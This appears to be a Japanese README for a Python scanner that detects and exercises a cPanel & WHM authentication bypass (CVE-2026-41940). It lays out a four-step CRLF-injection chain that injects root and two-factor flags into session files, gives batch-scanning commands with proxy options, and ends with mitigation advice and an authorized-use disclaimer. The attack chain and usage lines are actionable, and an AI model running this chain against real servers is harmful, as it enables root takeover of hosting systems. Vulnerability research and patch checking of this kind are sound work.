
cPanel & WHM認証バイパス(CVE-2026-41940)用スキャナーで、CRLFインジェクションとセッション操作を介して脆弱なバージョンを検出し、マルチスレッドとプロキシサポートを備えています。
| 項目 | 詳細 |
|---|
| CVE ID | CVE-2026-41940 |
| 脆弱性名 | cPanel & WHM セッションファイル CRLF インジェクション |
| 深刻度 | 🔴 CRITICAL (CVSS 9.8) |
| 影響を受けるバージョン | cPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5 |
| 脆弱性タイプ | 認証バイパス → Root権限取得 |
| 悪用難易度 | 低 |
cPanel & WHM はセッションファイルの処理に論理的欠陥があります:
saveSession() 関数はセッションファイルの書き込み後に filter_sessiondata() を呼び出しますAuthorization: Basic ヘッダーを構築できますhasroot=1、tfa_verified=1 などのフィールドが注入されます✅ 高精度検出 - 元のエクスプロイトチェーンを厳密に再現
✅ 依存関係なし - Python 標準ライブラリのみを使用
✅ マルチスレッド - バッチスキャンをサポート
✅ プロキシ対応 - Burp Suite/Owasp ZAP と互換性あり
✅ スマート解析 - プロトコルとポートを自動補完
✅ ハイライト出力 - 脆弱性の結果を赤色で強調表示
[1] POST /login/?login_only=1 → 事前認証セッションを取得
[2] GET / + CRLFインジェクション → セッションファイルを汚染
[3] GET /scripts2/listaccts → キャッシュリフレッシュをトリガー
[4] GET /cpsess/token/json-api/version → Root権限を検証
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py
# https:// を自動補完
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087
# 完全なURLを指定
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087
# ファイルからターゲットを読み込み
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20
# targets.txt の形式:
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087
# HTTPプロキシを使用
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080
# プロキシ経由でバッチスキャン
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5
| パラメータ | 説明 | 例 |
|---|---|---|
-u, --url | 単一ターゲット | -u 1.2.3.4:2087 |
-f, --file | ターゲットリストファイル | -f targets.txt |
-t, --threads | スレッド数(デフォルト10) | -t 20 |
--timeout | タイムアウト時間(デフォルト10秒) | --timeout 15 |
--proxy | HTTP/HTTPSプロキシ | --proxy http://127.0.0.1:8080 |
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087

13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087
スクリプトは以下のロジックで脆弱性を確認します:
whostmgrsession Cookie の取得に成功/cpsess{digit} パスが含まれる/json-api/version へのアクセスが 200 を返し、"version" フィールドを含む⚠️ 注意:一部のターゲットは 500/503 を返し "License" と表示される場合がありますが、これは認証バイパスが成功していることを示します。商業ライセンスが不足しているだけです。
以下の安全なバージョンに直ちにアップグレードしてください:
一時的な緩和策:
/var/cpanel/sessions/ ディレクトリの異常な変更を監視本ツールは認可されたセキュリティテストおよび防御研究のみに使用してください。 未認可のスキャン行為はすべて違法であり、その結果は自己責任となります。
Star ⭐ このプロジェクトを登録して、より多くのセキュリティツールのアップデートを入手してください!